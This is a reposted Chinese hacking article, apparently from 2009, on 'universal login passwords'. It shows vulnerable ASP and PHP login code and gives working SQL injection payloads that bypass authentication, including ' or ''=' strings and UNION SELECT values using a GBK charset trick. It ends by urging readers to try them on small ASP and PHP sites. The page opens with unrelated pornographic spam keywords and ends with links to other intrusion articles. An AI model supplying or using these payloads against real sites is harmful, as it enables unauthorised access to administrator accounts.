欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

黑客入侵常用的新型萬能登陸密碼

  發(fā)布時間:2009-10-11 19:56:33   作者:佚名   我要評論
本 文章無技術含量,只是提供一個思路,思路來源于前不久暴出的那個ewebeditor2.16版本的上傳漏洞。
對于過濾了單引號或者做了post防注入的 站點,此方法也無能為力了;但對于很多對登陸端沒做處理的網(wǎng)站,此方法值得一試,尤其是你已經(jīng)知道源碼了卻不能執(zhí)行命令(ACCESS數(shù)據(jù)庫)或者對方能 報錯( MYSQL數(shù)據(jù)庫)。

首先我們回顧下老的萬能密碼or漏洞的實現(xiàn)機制,先帖一段asp源碼:
---------------------------老的存在or漏洞的asp代碼----------------------------------------

復制代碼
代碼如下:

username = request.form("username")
password = request.form("password ")
set rs=server.createobject("adodb.recordset")
sql = "select * from admin where UserName='"&username&"' And PassWord='"& password &"'"
rs.open sql,conn,1,3--------------------------------------------------------------------------------------------------------

將表單中的username和password數(shù)據(jù)分別賦值給username和password,執(zhí)行
select * from admin where UserName='"&username&"' And PassWord='"&password&"' 語句
但如果被賦值的username是 ' or ''=' (password任意填寫)則SQL語句變成了
select * from admin where UserName='' or ''='' And PassWord='123'
''=''條件成立,則語句成功找到管理表里首位的帳號身份驗證登陸,因而成了or漏洞,除' or ''='以外,'or'='or' 啊什么的都可以,于是早年or漏洞形成了萬能登陸密碼。

針對這種or漏洞,很多asp站點進行了改進,改進后的源碼大致如下:
---------------------------后來經(jīng)過改進后的asp代碼-----------------------------------------

復制代碼
代碼如下:

username = request.form("username")
password = request.form("password ")
set rs=server.createobject("adodb.recordset")
sql = "select [password] from admin where UserName='"&username&"'"
rs.open sql,conn,1,3
If password = rs("password") then
…’登陸成功,文章來源:http://www.oldjun.com/
End if--------------------------------------------------------------------------------------------------------

現(xiàn)在很多asp站點的登陸頁面都是這么寫的,如果是mssql,還可以執(zhí)行SQL語句;但如果是ACCESS,很多人應該都會望而卻步了吧?其實在沒有過濾單引號的情況下,我們還是可以用“萬能密碼”登陸進后臺的。

下面我們進入主題,討論新型萬能登陸密碼,以php代碼為例,由于字符集編碼的問題,管理登陸端可以注入,先看源碼:

-----------存在字符集漏洞或者magic_quotes_gpc為off的php代碼-------------------

復制代碼
代碼如下:

$row=$DB->query_first("SELECT * FROM admin WHERE username='$username'");
If($row){
if($password!=$row[password]) {
…..//成功,文章來源:http://www.oldjun.com/
}else{
echo "用戶名或密碼錯誤!";
}
}else{
echo "用戶名或密碼錯誤!";
}--------------------------------------------------------------------------------------------------------

由于字符集問題,我們可以注入,但由于回顯都一樣,所以猜不到數(shù)據(jù)。根據(jù)錯誤提示,我們發(fā)現(xiàn)管理表一共6列,password在第三列,于是我們構造如下用戶名與密碼:
Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1
帶入登陸框,sql語句為:
SELECT * FROM admin WHERE username='-1蟎' union select 1,1 as password,1,1,1,1
前面的用戶名肯定不存在,于是select出來的password就是1了,就等于提交的password了,經(jīng)測試,成功繞過驗證。

現(xiàn)在我們再回頭看看之前改進過的asp登陸代碼,我們該如何繞過呢,原理同上:
Username=-1' union select 1 as [password] from admin where '1'='1
Password=1
呵呵,輕松繞過認證,到此為止大家知道該如何利用了吧,對于現(xiàn)在絕大多數(shù)的小asp站以及一定規(guī)模的php站點,大家不防試試這個萬能密碼~

相關文章

  • 看看黑客都在看什么!入侵個人電腦揭密(圖)

    前幾天看報紙說一位女孩個人電腦被黑客入侵控制,把照片發(fā)到網(wǎng)上威脅女孩的事,聯(lián)想到最近網(wǎng)上這樣的事挺多的,就想給大家說說怎么防范
    2008-10-08
  • 黑客入侵系統(tǒng)是通過3389端口

    你的ADSL用戶名和密碼不安全 剛剛上網(wǎng)看了會兒新聞,和朋友聊了聊天。之后打游戲的時候,發(fā)現(xiàn)比平時要卡,不知道是什么原因,難道是網(wǎng)絡問題嗎?不管它了。聽同事說美劇
    2008-10-08
  • 黑客在網(wǎng)吧內(nèi)是如何入侵其他電腦的

    從你這里真是學到不少東西呀,今天我去網(wǎng)吧和同事打了會兒游戲,我從來不在網(wǎng)吧上用QQ,總覺得網(wǎng)吧很危險,里面到全是木馬,我知道很多人能夠得到MM的QQ號,他們是怎么弄的
    2008-10-08
  • 黑客如何入侵裝有SQL數(shù)據(jù)庫的電腦主機

    近些年來,計算機的安全性能,曾突飛猛進的上升勢頭。導致以前網(wǎng)絡,遍地都是的弱口令肉雞,現(xiàn)在早已消失的不知去向??梢娖浒踩奶嵘潭?,難道菜鳥抓取肉雞成為了“天方
    2008-10-08
  • 黑客總結的實用的網(wǎng)站滲透步驟

    本文是黑客們總結的比較實用的網(wǎng)站滲透的一些步驟
    2012-10-23
  • 你的網(wǎng)站為什么被黑?原因大部分是后門backdoor腳本

    你的網(wǎng)站為什么被黑了?經(jīng)過網(wǎng)絡安全公司Sucuri的安全專家的調查,有大約68%的被黑網(wǎng)站存在著隱藏的后門backdoor腳本。這些后門腳本就是為入侵者提供的秘密通道,即使管理
    2016-05-23

最新評論